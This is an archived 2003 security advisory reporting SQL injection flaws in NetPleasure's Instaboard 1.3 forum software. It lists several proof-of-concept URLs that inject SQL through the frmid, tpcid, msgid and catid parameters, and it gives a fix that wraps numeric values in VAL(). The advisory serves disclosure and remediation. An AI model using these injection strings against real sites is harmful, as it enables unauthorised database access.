Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: etc :: a6162.htm

Instaboard SQL injection



16th Apr 2003 [SBWID-6162]
COMMAND

	Instaboard SQL injection

SYSTEMS AFFECTED

	NetPleasure's Instaboard 1.3

PROBLEM

	Jim    Dew    [jdew(at)cleannorth.org]    reported    sql     injections
	vulnerabilities:
	
	
	http://server/instaboard/index.cfm?frmid=1%20AND%20u.userid%20IN%20(select%20userid%20from%20users)
	http://server/instaboard/index.cfm?frmid=1&tpcid=1%20SQL
	http://server/instaboard/index.cfm?frmid=1%20SQL&tpcid=1
	http://server/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1%20SQL&msgid=11
	http://server/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1&msgid=11%20SQL
	http://server/instaboard/index.cfm?catid=1%20SQL
	

SOLUTION

	If you have the licensed version of the product, protect  the  numerical
	values within the CFQUERY tags:
	
	for example:
	
	In queries/oraclen/qry_GetOriginalMessage.cfm
	
	    change
	
	
	  WHERE m.tpcid = #tpcid#
	  AND m.userid = u.userid
	  AND m.msgid = #msgid#
	
	
	to
	
	
	  WHERE m.tpcid = #VAL(tpcid)#
	  AND m.userid = u.userid
	  AND m.msgid = #VAL(msgid)#
	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH